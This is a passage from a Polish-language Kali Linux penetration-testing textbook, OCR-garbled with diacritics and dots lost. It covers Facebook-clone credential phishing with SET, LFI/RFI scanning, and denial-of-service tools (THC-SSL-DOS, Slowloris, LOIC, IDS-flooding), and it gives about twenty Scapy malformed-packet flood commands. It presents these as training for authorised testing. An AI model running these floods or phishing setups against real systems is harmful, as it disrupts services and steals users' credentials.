W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

